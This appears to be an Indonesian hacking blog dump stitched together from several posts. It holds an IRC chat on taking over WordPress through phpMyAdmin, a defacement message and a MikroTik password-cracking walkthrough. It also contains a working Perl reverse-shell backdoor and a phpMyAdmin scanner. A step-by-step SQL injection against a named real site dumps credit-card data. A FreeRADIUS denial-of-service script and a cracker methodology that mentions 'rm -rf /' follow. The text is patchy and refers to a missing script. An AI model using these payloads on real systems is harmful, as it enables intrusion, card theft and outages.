[h3r3y] hoi
[h3r3y] orep?
[F] hoi
[bento] ha
[F] cara reset wp-admin e pie?
[bento] iki sopo
[bento] ?
[F] jancok
[F] hendrik
[bento] aslkdfjdsklfjsdklf
[F] Fu
[bento] kenek hack a
[bento] laskdfdslkfs
[bento] podo
[F] siktas ngerti
[F] klaaljalaiiaiailajaa
[F] moso?
[bento] aku pisan
[bento] kutil barang
[bento]
[bento] masuk o cpanel
[bento] iki aku lg maintenance pisan
[bento]
[F] wis masuk cpanel
[F] trus pie
[bento] masuko database
[bento] nak wp-user lak gak salah
[bento] nak kunu enek user passwd
[F] sik
[F] mysql database?
[bento] http://gantengtapikere.com/
[bento] kenek pisan
[bento]
[bento] kabeh sak hosting
[bento] =))
[bento] njembodddddd
[F] alsakljslkajlksjkla
[F] sik toh
[F] pie iki
[F] melbu database?
[F] sing ndi
[F] rasah urus sing liane sik
[bento] sing phpmyadmin ae
[bento] sing gampang
[F] io melbu ndi seh
[F] jelasno ae
[bento] sik
[bento] pertama masuk cpanel
[bento] bar ngunu goleki phpmyadmin
[F] trus
[bento] buka table database e
[bento] goleki sing wp-user
[F] ndi table database e
[bento] kan ketok iku
[F] ndak enek i
[bento] jasik
[bento] wedus
[bento] sebelah kiri lho
[F] Databases
[F] Database Descending
...
...
[F] iku cuman
[bento] ndi kene cpanelmu
[F] fantalicious.org/cpanel
...
...
[bento] wes
[bento] jajal login
[F] login nang ndi?
[bento] http://www.fantalicious.org/wp-admin/
...
...
[bento]
[bento] lek ndak salah iku file index.php ne di replace
[bento]
[F] ndi file index e?
[bento] anng cpanel kan enek
[F] lha sik
[bento] holoh iki duwe blog tapi ndak reti opo2 ikz
[F] iki mari melbu nang wp -admine
[F] ate diapakne?
[bento]
[bento] gak ngaruh
[F] wancok
[bento] hahah
[F] trus pie balekno?
[bento] sik
[F] nguruk i iku intine mad
[F] mbuled ae
[F] koyok iteL kowen
[bento] nang theme
[bento] iku gantien theme awakmu
[bento] ato
[bento] lek awakmu duwe arsip theme iku
[bento] uploadten maneh
[bento] timpa karo sing anyar
[bento] lek ndak
[bento] sementara gantien disik theme e
[bento] engko tekon nak sing ngurus blogmu
[bento] bek nowo duwe arsip theme
[bento] oyi
[bento] sing jelas
[F] wis gnti theme
[F] gak ngaruh i
[bento] passwd wp-admine wes mbalek
[bento] lha ngaruh i
[bento] refreshen
[bento] awakmu lho gawe proxy warnet e
[bento] nang kene wes ganti kok
[F] coba delok en
[F] tiku
[F] ouw
[F] nge chace
[bento] wes ganti sayyank
[bento] ho oh
[bento] refres bolak balik ae

hoalah mad… duwe blog dewe kok bingung .. ketoro lak ndak gawe dewe ikz… hayuk blajar mad ojok PBan tok …

allah akbar STooP Admin .. ! ~@ I S4udi h4ck Where Are Your security ” It’s %0 Your Server Get Root ! I C0ntR0L We Are Here And There And Every Where..!! And Now Your Server In H3LL Dude..!! But Please Admin Don’t Cry Because I Laugh of Your Funny Face For Connect Us :

hihihihi… akhirnya kena deface juga.. paling tidak seperti itulah sekilas jadinya weblog saia yang kena hack… and thank`s untuk anak” S4udi h4ck yang uda bisa masuk matur suwun sudah di ingatken

1. booting PC router pake cd linux live CD kayak ubuntu ato apalah yg laennya (ane sih ake ubuntu)
2. kalo uda masuk dekstopnya kemudian copy file user.dat letaknya di /nova/store/user.dat (copy pake flashdisk ato apalah terserah). trus reboot dan masuk mikocok lagi...
3. pindah ke PC yang ada OS linuxnya (distro terserah asal uda di install pakage g++, ane pake debian lenny).
4. extrak dulu file mtpass v0.5 pake perintah tar -xvjf namafile
5. masuk ke direktory hasil extrak trus compile file mtpass.cpp dengan perintah g++ -lssl -lcrypto mtpass.cpp -o mtpass(nama file hasil compile)
6. hasilnya ada file baru yaitu mtpass, trus copy file user.dat dalam folder tempat mtpass(nama file hasil compile)
7. finishing jalankan dengan perintah ./mtpass user.dat
8. contoh hasilnya ada disini

**yang mau mtpass v0.5 ada disini

selamad mencoba kawand…..

thank`s
banksonk

IP Spoofing juga dikenal sebagai Source Address Spoofing, yaitu pemalsuan alamat IP attacker sehingga sasaran menganggap alamat IP attacker adalah alamat IP dari host di dalam network bukan dari luar network. Misalkan attacker mempunyai IP address type A 66.25.xx.xx ketika attacker melakukan serangan jenis ini maka Network yang diserang akan menganggap IP attacker adalah bagian dari Networknya misal 192.xx.xx.xx yaitu IP type C. IP Spoofing terjadi ketika seorang attacker ‘mengakali’ packet routing untuk mengubah arah dari data atau transmisi ke tujuan yang berbeda. Packet untuk routing biasanya di transmisikan secara transparan dan jelas sehingga membuat attacker dengan mudah untuk memodifikasi asal data ataupun tujuan dari data. Teknik ini bukan hanya dipakai oleh attacker tetapi juga dipakai oleh para security profesional untuk men tracing identitas dari para attacker. protokol yang menangani komunikasi antar komputer kebanyakan berhasil di spoof. ICMP (Internet Control Message Protocol) adalah salah satunya(vulnerable) karena protokol ini dilewati oleh informasi dan pesan-pesan kesalahan diantara dua node dalam network. Internet Group Message Protocol(IGMP) dapat dieksploitasi dengan menggunakan serangan tipe ini karena IGMP melaporkan kondisi kesalahan pada level user datagram, selain itu juga protokol ini mengandung Informasi routing dan Informasi Network. (UDP) User Datagram Protocol juga dapat ‘diminta’ untuk menampilkan identitas host sasaran. Solusi untuk mencegah IP spoofing adalah dengan cara mengamankan packet-packet yang ditransmisikan dan memasang screening policies. Enkripsi Point-to-point juga dapat mencegah user yang tidak mempunyai hak untuk membaca data/packet. Autentikasi dapat juga digunakan untuk menyaring source yang legal dan bukan source yang sudah di spoof oleh attacker. Dalam pencegahan yang lain, Admininistrator dapat menggunakan signature untuk paket-paket yang berkomunikasi dalam networknya sehingga meyakinkan bahwa paket tersebut tidak diubah dalam perjalanan. Anti Spoofing rules(peraturan anti spoof) yang pada dasarnya memberitahukan server untuk menolak packet yang datangnya dari luar yang terlihat datangnya dari dalam, umumnya hal ini akan mematahkan setiap serangan spoofing.

2. FTP Attack

Salah satu serangan yang dilakukan terhadap File Transfer Protocol adalah serangan buffer overflow yang diakibatkan oleh malformed command. tujuan menyerang FTP server ini rata-rata adalah untuk mendapatkan command shell ataupun untuk melakukan Denial Of Service. Serangan Denial Of Service akhirnya dapat menyebabkan seorang user atau attacker untuk mengambil resource didalam network tanpa adanya autorisasi, sedangkan command shell dapat membuat seorang attacker mendapatkan akses ke sistem server dan file-file data yang akhirnya seorang attacker bisa membuat anonymous root-acces yang mempunyai hak penuh terhadap system bahkan network yang diserang.
Tidak pernah atau jarang mengupdate versi server dan mempatchnya adalah kesalahan yang sering dilakukan oleh seorang admin dan inilah yang membuat server FTP menjadi rawan untuk dimasuki. Sebagai contoh adalah FTP server yang populer di keluarga UNIX yaitu WU-FTPD yang selalu di upgrade dua kali dalam sehari untuk memperbaiki kondisi yang mengizinkan terjadinya bufferoverflow Mengexploitasi FTP juga berguna untuk mengetahui password yang terdapat dalam sistem, FTP Bounce attack(menggunakan server ftp orang lain untuk melakukan serangan), dan mengetahui atau mensniff informasi yang berada dalam sistem.

3. Unix Finger Exploits

Pada masa awal internet, Unix OS finger utility digunakan secara efficient untuk men sharing informasi diantara pengguna. Karena permintaan informasi terhadap informasi finger ini tidak menyalahkan peraturan, kebanyakan system Administrator meninggalkan utility ini (finger) dengan keamanan yang sangat minim, bahkan tanpa kemanan sama sekali. Bagi seorang attacker utility ini sangat berharga untuk melakukan informasi tentang footprinting, termasuk nama login dan informasi contact. Utility ini juga menyediakan keterangan yang sangat baik tentang aktivitas user didalam sistem, berapa lama user berada dalam sistem dan seberapa jauh user merawat sistem. Informasi yang dihasilkan dari finger ini dapat meminimalisasi usaha cracker dalam menembus sebuah sistem. Keterangan pribadi tentang user yang dimunculkan oleh finger daemon ini sudah cukup bagi seorang atacker untuk melakukan social engineering dengan menggunakan social skillnya untuk memanfaatkan user agar ‘memberitahu’ password dan kode akses terhadap system.

4. Flooding & Broadcasting

Seorang attacker bisa menguarangi kecepatan network dan host-host yang berada di dalamnya secara significant dengan cara terus melakukan request/permintaan terhadap suatu informasi dari sever yang bisa menangani serangan classic Denial Of Service(Dos), mengirim request ke satu port secara berlebihan dinamakan flooding, kadang hal ini juga disebut spraying. Ketika permintaan flood ini dikirim ke semua station yang berada dalam network serangan ini dinamakn broadcasting. Tujuan dari kedua serangan ini adalah sama yaitu membuat network resource yang menyediakan informasi menjadi lemah dan akhirnya menyerah.
Serangan dengan cara Flooding bergantung kepada dua faktor yaitu: ukuran dan/atau volume (size and/or volume). Seorang attacker dapat menyebabkan Denial Of Service dengan cara melempar file berkapasitas besar atau volume yang besar dari paket yang kecil kepada sebuah system. Dalam keadaan seperti itu network server akan menghadapi kemacetan: terlalu banyak informasi yang diminta dan tidak cukup power untuk mendorong data agar berjalan. Pada dasarnya paket yang besar membutuhkan kapasitas proses yang besar pula, tetapi secara tidak normal paket yang kecil dan sama dalam volume yang besar akan menghabiskan resource secara percuma, dan mengakibatkan kemacetan. Attacker sering kali menggunakan serangan flooding ini untuk mendapatkan akses ke system yang digunakan untuk menyerang network lainnya dalam satu serangan yang dinamakan Distributed Denial Of Service(DDOS). Serangan ini seringkali dipanggil smurf jika dikirim melaluli ICMP dan disebut fraggles ketika serangan ini dijalakan melewati UDP.
Suatu node (dijadikan tools) yang menguatkan broadcast traffic sering disebut sebagai Smurf Amplifiers, tools ini sangat efektif untuk menjalankan serangan flooding. Dengan melakukan spoofing terhadap network sasaran, seorang attacker dapat mengirim sebuah request ke smurf amplifier, Network yang di amplifiying(dikuatkan) akan mengirim respon kesetiap host di dalam network itu sendiri, yang berarti satu request yang dilakukan oleh attacker akan menghasilkan pekerjaan yang sama dan berulang-ulang pada network sasaran, hasil dari serangan ini adalah sebuah denial of service yang tidak meninggalkan jejak. Serangan ini dapat diantisipasi dengan cara menolak broadcast yang diarahkan pada router. TCP-level Flooding (kebanyakan SYN ATTACK) telah digunakan pada bulan februari tahun 2000 untuk menyerang Yahoo!, eBay dll yang menggunakan serangan DDOS(Distributed Denial Of Service). Network yang tidak menggunakan firewall untuk pengecekan paket-paket TCP biasanya bisa diserang dengan cara ini. Beberapa fungsi penyaringan pada firewall (Firewall Filtering Function) biasanya akan mampu untuk menahan satu serangan flooding dari sebuah alamat IP, tetapi serangan yang dilakukan melalui DDOS akan sulit di cegah karena serangan ini seperti kita ketahui datangnya dari berbagai alamat IP secara berkala. Sebenarnya salah satu cara untuk menghentikan serangan DDOS adalah dengan cara mengembalikan paket ke alamat asalnya atau juga dengan cara mematikan network(biasanya dilakukan oleh system yang sudah terkena serangan sangat parah).
]]> http://www.kukukakikukakukaku.com/cracker-attack.sonk/feed 2 http://www.kukukakikukakukaku.com/tak-ada-pintu-jendela-pun-jadi.sonk http://www.kukukakikukakukaku.com/tak-ada-pintu-jendela-pun-jadi.sonk#comments Fri, 23 Oct 2009 04:17:30 +0000 bento http://www.kukukakikukakukaku.com/?p=54 Dunia cyber emank syerem… hihihihihihi…atut

walaupun ga punya kunci pintu jendela terbuka pun jadi…. kayaknya kata² itu pas untuk script backdor berikut…:

#!/usr/bin/perl
use IO::Socket;
#
#/home/programing$ perl dc.pl
#
#Usage: dc.pl [Host] [Port]
#
#Ex: dc.pl 127.0.0.1 2121
#/home/programing$ perl dc.pl 127.0.0.1 2121
#
#[*] Resolving HostName
#[*] Connecting... 127.0.0.1
#[*] Spawning Shell
#[*] Connected to remote host
#
#bash-2.05b# nc -vv -l -p 2121
#listening on [any] 2121 ...
#connect to [127.0.0.1] from localhost [127.0.0.1] 2121
#
#--==Systeminfo==--
#Linux SlackwareLinux 2.6.7 #1 SMP Thu Dec 23 00:05:39 IRT 2004 i686 unknown unknown GNU/Linux
#
#--==Userinfo==--
#uid=1001(rocu) gid=100(users) groups=100(users)
#
#--==Directory==--
#/root
#
#--==Shell==--
#
$system = '/bin/sh';
$ARGC=@ARGV;
print "--== Rampok si kacRuT ==-- \n\n";
if ($ARGC!=2) **
print "Usage: $0 [Host] [Port] \n\n";
die "Ex: $0 127.0.0.1 2121 \n";
}
use Socket;
use FileHandle;
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n";
connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n";
print "[*] Resolving HostName\n";
print "[*] Connecting... $ARGV[0] \n";
print "[*] Spawning Shell \n";
print "[*] Connected to remote host \n";
SOCKET->autoflush();
open(STDIN, ">&SOCKET");
open(STDOUT,">&SOCKET");
open(STDERR,">&SOCKET");
print "--== Rampok si kacRuT ==-- \n\n";
system("unset HISTFILE; unset SAVEHIST ;echo --==Systeminfo==-- ; uname -a;echo;
echo --==Userinfo==-- ; id;echo;echo --==Directory==-- ; pwd;echo; echo --==Shell==-- ");
system($system);
#bento

selamad mencoba…

#!/usr/bin/perl
# phpMyAdmin Checker
# Author: mHc@MimiZu (Re Edit) #
use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Request;
my ($add,$iplist,$url,@path,@raw_data);
print q(
phpMyAdmin Checker by mHc
);
if(@ARGV !=1) **
print "Usage: perl phpmyadmin.pl e.g. perl phpmyadmin.pl iplist.txt";
exit;
}
$iplist = shift;
@path = (
"/phpMyAdmin/",
"/PMA/",
"/admin/",
"/dbadmin/",
"/mysql/",
"/myadmin/",
"/phpmyadmin2/",
"/phpMyAdmin2/",
"/phpMyAdmin-2/",
"/php-my-admin/",
"/phpMyAdmin-2.2.3/",
"/phpMyAdmin-2.2.6/",
"/phpMyAdmin-2.5.1/",
"/phpMyAdmin-2.5.4/",
"/phpMyAdmin-2.5.5-rc1/",
"/phpMyAdmin-2.5.5-rc2/",
"/phpMyAdmin-2.5.5/",
"/phpMyAdmin-2.5.5-pl1/",
"/phpMyAdmin-2.5.6-rc1/",
"/phpMyAdmin-2.5.6-rc2/",
"/phpMyAdmin-2.5.6/",
"/phpMyAdmin-2.5.7/",
"/phpMyAdmin-2.5.7-pl1/",
"/phpMyAdmin-2.6.0-alpha/",
"/phpMyAdmin-2.6.0-alpha2/",
"/phpMyAdmin-2.6.0-beta1/",
"/phpMyAdmin-2.6.0-beta2/",
"/phpMyAdmin-2.6.0-rc1/",
"/phpMyAdmin-2.6.0-rc2/",
"/phpMyAdmin-2.6.0-rc3/",
"/phpMyAdmin-2.6.0/",
"/phpMyAdmin-2.6.0-pl1/",
"/phpMyAdmin-2.6.0-pl2/",
"/phpMyAdmin-2.6.0-pl3/",
"/phpMyAdmin-2.6.1-rc1/",
"/phpMyAdmin-2.6.1-rc2/",
"/phpMyAdmin-2.6.1/",
"/phpMyAdmin-2.6.1-pl1/",
"/phpMyAdmin-2.6.1-pl2/",
"/phpMyAdmin-2.6.1-pl3/",
"/phpMyAdmin-2.6.2-rc1/",
"/phpMyAdmin-2.6.2-beta1/",
"/phpMyAdmin-2.6.2-rc1/",
"/phpMyAdmin-2.6.2/",
"/phpMyAdmin-2.6.2-pl1/",
"/phpMyAdmin-2.6.3/",
"/phpMyAdmin-2.6.3-rc1/",
"/phpMyAdmin-2.6.3/",
"/phpMyAdmin-2.6.3-pl1/",
"/phpMyAdmin-2.6.4-rc1/",
"/phpMyAdmin-2.6.4-pl1/",
"/phpMyAdmin-2.6.4-pl2/",
"/phpMyAdmin-2.6.4-pl3/",
"/phpMyAdmin-2.6.4-pl4/",
"/phpMyAdmin-2.6.4/",
"/phpMyAdmin-2.7.0-beta1/",
"/phpMyAdmin-2.7.0-rc1/",
"/phpMyAdmin-2.7.0-pl1/",
"/phpMyAdmin-2.7.0-pl2/",
"/phpMyAdmin-2.7.0/",
"/phpMyAdmin-2.8.0-beta1/",
"/phpMyAdmin-2.8.0-rc1/",
"/phpMyAdmin-2.8.0-rc2/",
"/phpMyAdmin-2.8.0/",
"/phpMyAdmin-2.8.0.1/",
"/phpMyAdmin-2.8.0.2/",
"/phpMyAdmin-2.8.0.3/",
"/phpMyAdmin-2.8.0.4/",
"/phpMyAdmin-2.8.1-rc1/",
"/phpMyAdmin-2.8.1/",
"/phpMyAdmin-2.8.2/",
"/sqlmanager/",
"/mysqlmanager/",
"/p/m/a/",
"/PMA2005/",
"/pma2005/",
"/phpmanager/",
"/php-myadmin/",
"/phpmy-admin/",
"/webadmin/",
"/sqlweb/",
"/websql/",
"/webdb/",
"/mysqladmin/",
"/mysql-admin/");
open(IPLIST, $iplist) || die "
* Error: File not found\n";
@raw_data=;
close(IPLIST);
print " Scan Started\n\n";
foreach $url (@raw_data)
**
chomp($url);
foreach $add (@path)
**
my $address = $url.$add;
my $con = HTTP::Request->new(GET=>$address);
my $useragent = LWP::UserAgent->new;
my $f = $useragent->request($con);
if($f->is_success && $f->status_line =~ /200/)
**
print "[!] Found: $address\n";
open (F,">>","found.txt");
print F "$address\n";
close(F);
}
}
}

from : MiMiZu cRew

Huyee…siapkan sebungkus starmild + kopi susu
langsung sajoo, misal pada site http://www.scootsusa.com/, kita cari link yang ada bugnya…
kita dapet :
http://www.scootsusa.com/customer_testimonials.php?testimonial_id=3
Tinggal tambahin tanda petik satu (’) sajoo untuk test Vulnerbilitiesnya

alhasil muncul keterangan error seperti berikut :
1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
select * FROM customer_testimonials WHERE testimonials_id = 3\'

Sekarang kita kasi perintah order by…buat nyari ada berapa kolom di sana…
http://www.scootsusa.com/customer_testimonials.php?testimonial_id=3 order by 20--
artinya kita coba cek langsung di binary 20, sekarang kita kurangin sampe muncul yang true…

ok..kita dapet yang true di binary 8
http://www.scootsusa.com/customer_testimonials.php?testimonial_id=3 order by 8--
sedangkan yang ke 9 uda false, jadi kita dapet binarynya di angka 8.

Selanjutnya kita bajak pake union select.
http://www.scootsusa.com/customer_testimonials.php?testimonial_id=3 union all select 1,2,3,4,5,6,7,8--
hasilnya :
Testimonial by 4
3
6


Langsung saja misal kita ambil angka 3 atau 6 juga bisa.
kita cek versi sqlnya doeloe…
http://www.scootsusa.com/customer_testimonials.php?testimonial_id=3 union all select 1,2,version(),4,5,6,7,8--
hasilnya :
Testimonial by 4
5.0.67.d7-ourdelta-log
6
ternyata sqlnya versi 5… lanjut bajak si kacrut…

kemudian cari table dan coloumnya…
http://www.scootsusa.com/customer_testimonials.php?testimonial_id=3 union all select 1,2,table_name,4,5,6,7,8 from information_schema.tables where table_schema=database()--

nah lhoo kluar semua tuh nama tablenya…xixiixixixixi
Berhubung sekarang kita mau cari data CC , kita ambil table yg nyimpen data² CC
Biasanya CC ada di table orders.
Karna kita dah nemu table orders,kita coba pake table orders. Table lainnya silahkan oprek sndiri yah…

sekarang kita cari coloumnya…
sebelumnya kita konvert dolo table orders jadi hexa, jadinya 6F7264657273
sebelumnya kita tambahin karakter 0x pada hasil convert tadi kemudian masukkan ke urlnya…
http://www.scootsusa.com/customer_testimonials.php?testimonial_id=3 union all select 1,2,column_name,4,5,6,7,8 from information_schema.columns where table_name=0x6F7264657273--

Alhasil keluar tuh coloum²nya…hohoho
payment_method,cc_type,cc_owner,cc_number,cc_expires, dll

ok skarang kita masukkan data² tadi dan haslinya…
http://www.scootsusa.com/customer_testimonials.php?testimonial_id=3 union select 1,2,concat_ws(0x3a,payment_method,cc_type,cc_owner,cc_number,cc_expires),4,5,6,7,8 from orders--

dan…eng..ing..eng…xixixixiixixixi

semoga aja itu bisa sedikit membantu temen² yg pengen belajar SQL injection..Ini semua hanya sebagai pengetahuan sajooo…saia tidak ikod bertanggung jawab jika di salah pergunakan…

salam hangat…
banksonk

Earlier today, while reading through Full Disclosure, I came across something interesting: a Freeradius DoS bug. This piqued my interest as I’m currently experiencing _something_ that’s periodically knocking over radiusd. Furthermore, the radius server in question talks to a router with problematic L2TP tunnels (caused by a software bugs in L2TP sequencing on the Telco router on the other end…their vendor has confirmed the problems)

Time to create the packet of death. Scapy doesn’t appear to have a layer for RadiusAttributes yet, thankfully it IS in their Trac.

So, download the layer to scapy/layers, ensure that it imports the required items:
import struct
from scapy.packet import *
from scapy.fields import *
from scapy.layers.inet import UDP

from scapy.layers.radius import Radius
Add “radiuslib” to the load_layers array in config.py, and we’re ready to go:
#!/usr/bin/env python
# FreeRadius Packet Of Death
# Matthew Gillespie 2009-09-11
import sys
from scapy.all import IP,UDP,send,Radius,RadiusAttr
if len(sys.argv) != 2:
print “Usage: radius_killer.py \n”
sys.exit(1)
PoD=IP(dst=sys.argv[1])/UDP(sport=60422,dport=1812)/ \
Radius(code=1,authenticator=”\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99″,id=180)/ \
RadiusAttr(type=69,value=”",len=2)
send(PoD)

Interestingly, one doesn’t need a shared key to send the packet of death, as you can tell the authenticator for the Access-Request packet is pulled out of thin air.

I’m assuming that most people iptable off access to their radius servers, so playing whack-a-mole with a provider probably isn’t that do-able. Beyond that, to even come close to possibly exploiting this, you need to be listed in clients.conf – so there’s already that level of trust. Correct me if I’m wrong. Either way, updated packages are available.

source : www.braindeadprojects.com

Berbagai teknik keamanan jaringan Internet dapat di peroleh secara mudah di Internet antara lain di http://www.sans.org, http://www.rootshell.com, http://www.linuxfirewall.org/, http://www.cerias.purdue.edu/coast/firewalls/, http://www.redhat.com/mirrors/LDP/HOWTO/VPN-Masquerade-HOWTO.html. Beberapa Frequently Asked Questions (FAQ) tentang keamanan jaringan bisa diperoleh di http://www.iss.net/vd/mail.html, http://www.v-one.com/documents/fw-faq.htm. Dan bagi para experimenter beberapa script / program yang sudah jadi dapat diperoleh antara lain di http://bastille-linux.sourceforge.net/, http://www.redhat.com/support/docs/tips/firewall/firewallservice.html.

Cara paling sederhana untuk melihat kelemahan sistem adalah dengan cara mencari informasi dari berbagai vendor misalnya di http://www.sans.org/newlook/publications/roadmap.htm#3b tentang kelemahan dari sistem yang mereka buat sendiri. Di samping, memonitoring berbagai mailing list di Internet yang berkaitan dengan keamanan jaringan seperti dalam daftar http://www.sans.org/newlook/publications/roadmap.htm#3e.

Pada dasarnya dunia hacker & cracker tidak berbeda jauh dunia seni kebetulan disini kita berbicara tentang seni perang & seni keamanan jaringan. Seperti dijelaskan oleh Front-line Information Security Team, “Techniques Adopted By ‘System Crackers’ When Attempting To Break Into Corporate or Sensitive Private Networks,” fist@ns2.co.uk http://www.ns2.co.uk. Seorang cacker umumnya pria usia 16-25 tahun. Melakukan cacking untuk meningkatkan kemampuan atau menggunakan sumber daya di jaringan untuk kepentingan sendiri. Umumnya cracker adalah opportunis. Melihat kelemahan sistem dengan mejalankan program scanner. Setelah memperoleh akses root, umumnya cracker akan menginstall pintu belakang (backdoor) dan menutup semua kelemahan umum yang ada.

Seperti kita tahu bahwa umumnya berbagai perusahaan / dotcommers akan menggunakan Internet untuk (1) hosting web server mereka, (2) komunikasi e-mail dan (3) memberikan akses web / internet kepada karyawan-nya. Pemisahan jaringan Internet dan IntraNet umumnya dilakukan dengan menggunakan teknik / software Firewall dan Proxy server. Melihat kondisi penggunaan di atas, kelemahan sistem umumnya dapat di tembus misalnya dengan menembus mailserver external / luar yang memudahkan akses ke mail server dalam perusahaan. Dengan menggunakan agressive-SNMP scanner & program yang memaksa SNMP community string dapat mengubah sebuah router menjadi bridge (jembatan) yang kemudian dapat digunakan untuk batu loncatan.

Agar cracker terlindungi pada saat melakukan serangan, teknik cloacking dilakukan dengan cara melompat dari mesin yang sebelumnya telah di compromised (ditaklukan) melalui program telnet atau rsh. Pada mesin Windows serangan dapat dilakukan dengan melompat dari software wingate. Atau melompat dari mesin yang menggunakan proxy yang konfigurasinya kurang baik.

Setelah berhasil melompat dan memasuki sistem lain, cracker harus melakukan probing terhadap jaringan dan mengumpulkan informasi yang dibutuhkan. Hal ini dilakukan dengan beberapa cara, misalnya (1) menggunakan nslookup untuk menjalankan perintah ‘ls ‘ , (2) melihat file HTML di webserver anda untuk mengidentifikasi mesin lainnya, (3) melihat berbagai dokumen di FTP server, (4) menghubungkan diri ke mail server dan menggunakan perintah ‘expn ‘, dan (5) mem-finger user di mesin-mesin eksternal lainnya.

Langkah selanjutnya, cracker akan mengidentifikasi komponen jaringan yang dipercaya oleh system apa saja. Komponen jaringan tersebut biasanya mesin administrator dan server yang biasanya di anggap paling aman di jaringan. Start dengan check akses & eksport NFS ke berbagai direktori yang kritis seperti /usr/bin, /etc dan /home. Eksploitasi mesin melalui kelemahan Common Gateway Interface (CGI), dengan akses ke file /etc/hosts.allow.

Selanjutnya cracker harus mengidentifikasi komponen jaringan yang lemah dan bisa di taklukan. Cracker bisa mengunakan program di Linux seperti ADMhack, mscan, nmap dan banyak scanner kecil lainnya. Program seperti ‘ps’ & ‘netstat’ di buat trojan (ingat cerita kuda troya?) untuk menyembunyikan proses scanning. Bagi cracker yang cukup advanced dapat mengunakan aggressive-SNMP scanning untuk men-scan peralatan dengan SNMP.

Setelah cracker berhasil mengidentifikasi komponen jaringan yang lemah dan bisa di taklukan, maka cracker akan menjalan program untuk menaklukan program daemon di server yang lemah. Selanjutnya cracker dapat dengan mudah memperoleh akses sebagai ‘root’ (administrator tertinggi di server).

Untuk menghilangkan jejak, seorang cracker perlu melakukan operasi pembersihan ‘clean-up‘ operation dengan cara membersihkan berbagai log file. Dan menambahkan program untuk masuk dari pintu belakang ‘backdooring’. Mengganti file .rhosts di /usr/bin untuk memudahkan akses ke mesin yang di taklukan melalui rsh & csh.

Selanjutnya seorang cracker dapat menggunakan mesin yang sudah ditaklukan untuk kepentingannya sendiri, misalnya mengambil informasi sensitif yang seharusnya tidak dibaca, cracking mesin lain dengan melompat dari mesin yang di taklukan, memasang sniffer untuk melihat / mencatat berbagai trafik / komunikasi yang lewat, bahkan bisa mematikan jaringan dengan cara menjalankan perintah ‘rm –rf / &’.

Oleh karena itu semua mesin & router yang menjalankan misi kritis sebaiknya selalu di periksa keamanannya & di patch oleh software yang lebih baru.

from : Onno W. Purbo

keterangan :
echo = menampilkan text
rm = perintah untuk remove
touch = untuk membuat file kosong
chmod = merubah permision file

buat file dengan nama terserah, misal luna.sh dengan perintah
nano luna.sh
atau
vi luna.sh
atau
vim luna.sh
atau
pico luna.sh

kemudian isi file tersebut dengan script diatas dan save…
setelah itu beri permision agar file sersebut bisa di esekusi, dengan perintah :
chmod +x luna.sh

setelah itu esekusi file dengan perintah :
./luna.sh

hanya sekedar info dan pembelajaran saja, tidak untuk disalah pergunakan…dan sekalipun disalah pergunakan saya tidak ikut bertanggung jawab….!!!

salam hangat…
banksonk